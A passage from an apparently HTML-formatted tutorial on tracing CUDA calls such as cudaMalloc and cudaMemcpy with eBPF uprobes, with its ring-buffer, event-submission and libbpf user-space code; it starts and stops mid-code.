    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;1024&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The ring buffer is a crucial component for our tracer. It acts as a high-performance queue where the eBPF program can submit events, and the user-space application can retrieve them. We set a generous size of 256KB to absorb bursts of events. If the buffer still fills up, &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; returns &lt;code&gt;NULL&lt;/code&gt; and that event is dropped.&lt;/p&gt;
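&lt;p&gt;How many events 256KB can hold depends on the record size. The sketch below gives a rough upper bound, assuming each record carries an 8-byte header and is rounded up to a multiple of 8 bytes, as the kernel ring buffer does. &lt;code&gt;ringbuf_capacity&lt;/code&gt; is a hypothetical helper, and the 120-byte record size in the usage note is purely illustrative because &lt;code&gt;MAX_DETAILS_LEN&lt;/code&gt; is not shown here.&lt;/p&gt;

```c
#include <assert.h>
#include <stddef.h>

#define RINGBUF_HDR_SZ 8u   /* per-record header in the kernel ring buffer */

/* Rough upper bound on how many records of record_size bytes fit at once. */
static size_t ringbuf_capacity(size_t buf_bytes, size_t record_size)
{
    /* Header plus payload, rounded up to the next multiple of 8 bytes. */
    size_t slot = (record_size + RINGBUF_HDR_SZ + 7u) & ~(size_t)7u;

    return buf_bytes / slot;
}
```

&lt;p&gt;For example, &lt;code&gt;ringbuf_capacity(256 * 1024, 120)&lt;/code&gt; evaluates to 2048, so a burst of more than about two thousand such events between two polls of the consumer would start to overflow the buffer.&lt;/p&gt;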

&lt;p&gt;For each CUDA operation, we implement a helper function to collect relevant data. Let's look at the &lt;code&gt;submit_malloc_event&lt;/code&gt; function as an example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kr"&gt;inline&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Fill common fields */&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Fill event-specific data */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;bpf_ringbuf_submit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function first reserves space in the ring buffer for our event. Then it fills in common fields like the process ID and name. For a malloc event, we store either the requested size (on function entry) or the return value (on function exit). Finally, we submit the event to the ring buffer.&lt;/p&gt;

&lt;p&gt;The actual probes are attached to CUDA functions using SEC annotations. For cudaMalloc, we have:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_malloc_enter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;ptr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uretprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KRETPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_malloc_exit&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_malloc_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



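&lt;p&gt;The first function is called when &lt;code&gt;cudaMalloc&lt;/code&gt; is entered, capturing the requested size. The second is called when &lt;code&gt;cudaMalloc&lt;/code&gt; returns, capturing the error code. The &lt;code&gt;BPF_KPROBE&lt;/code&gt; and &lt;code&gt;BPF_KRETPROBE&lt;/code&gt; macros are used here only to unpack the function arguments and the return value from the register context; the &lt;code&gt;SEC("uprobe")&lt;/code&gt; and &lt;code&gt;SEC("uretprobe")&lt;/code&gt; annotations are what make these user-space probes. This pattern is repeated for each CUDA function we want to trace.&lt;/p&gt;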

&lt;p&gt;One interesting case is &lt;code&gt;cudaMemcpy&lt;/code&gt;, which transfers data between host and device:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"uprobe"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_KPROBE&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cuda_memcpy_enter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;dst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;src&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;submit_memcpy_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;kind&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we capture not just the size but also the "kind" parameter, which indicates the direction of the transfer (host-to-device, device-to-host, or device-to-device). This gives us valuable information about data movement patterns.&lt;/p&gt;
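
&lt;p&gt;For readers decoding the raw &lt;code&gt;kind&lt;/code&gt; value by hand, the mapping below may help. It is a minimal sketch rather than code from the tutorial: the helper name &lt;code&gt;memcpy_kind_str&lt;/code&gt; is hypothetical, and the numeric values follow the &lt;code&gt;cudaMemcpyKind&lt;/code&gt; enum of the CUDA Runtime API.&lt;/p&gt;

```c
/* Hypothetical helper (not part of the tutorial code): translate the raw
 * `kind` argument of cudaMemcpy into a readable direction. The values
 * mirror the cudaMemcpyKind enum from the CUDA Runtime API. */
static const char *memcpy_kind_str(int kind)
{
    switch (kind) {
    case 0:  return "HostToHost";
    case 1:  return "HostToDevice";
    case 2:  return "DeviceToHost";
    case 3:  return "DeviceToDevice";
    case 4:  return "Default"; /* direction inferred from the pointers */
    default: return "Unknown";
    }
}
```

&lt;p&gt;A helper like this could be called from the user-space formatter so that a memcpy event prints a direction name instead of a bare number.&lt;/p&gt;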

&lt;h2&gt;
  
  
  User-Space Application Details
&lt;/h2&gt;

&lt;p&gt;The user-space application (&lt;code&gt;cuda_events.c&lt;/code&gt;) is responsible for loading the eBPF program, processing events from the ring buffer, and displaying them in a user-friendly format.&lt;/p&gt;

&lt;p&gt;First, the program parses command-line arguments to configure its behavior:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;verbose&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;print_timestamp&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;cuda_library_path&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;include_returns&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;target_pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;print_timestamp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;include_returns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cuda_library_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target_pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



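&lt;p&gt;This structure stores configuration options such as whether to print timestamps or include return probes. By default, timestamps and return events are enabled, no library path is set, and &lt;code&gt;target_pid&lt;/code&gt; is -1, which means no PID filter is applied.&lt;/p&gt;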

&lt;p&gt;The program uses &lt;code&gt;libbpf&lt;/code&gt; to load and attach the eBPF program to CUDA functions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;attach_cuda_func&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;cuda_events_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;lib_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;func_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog_exit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
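    &lt;span class="cm"&gt;/* Options for the attach call; func_name lets libbpf resolve the symbol offset */&lt;/span&gt;
    &lt;span class="n"&gt;LIBBPF_OPTS&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach entry uprobe */&lt;/span&gt;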
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;func_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;func_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_entry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
                                &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target_pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lib_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;uprobe_opts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="cm"&gt;/* Error handling... */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach exit uprobe */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog_exit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="cm"&gt;/* Similar for return probe... */&lt;/span&gt;
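    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;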
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function takes a function name (like "cudaMalloc") and the corresponding eBPF programs for entry and exit. It then attaches these programs as uprobes to the specified library.&lt;/p&gt;

&lt;p&gt;One of the most important functions is &lt;code&gt;handle_event&lt;/code&gt;, which processes events from the ring buffer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;tm&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;tm&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_DETAILS_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;time_t&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Skip return probes if requested */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;include_returns&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;tm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;localtime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;strftime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="s"&gt;"%H:%M:%S"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tm&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;get_event_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;print_timestamp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%-8s "&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%-16s %-7d %-20s %8s %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
           &lt;span class="n"&gt;event_type_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
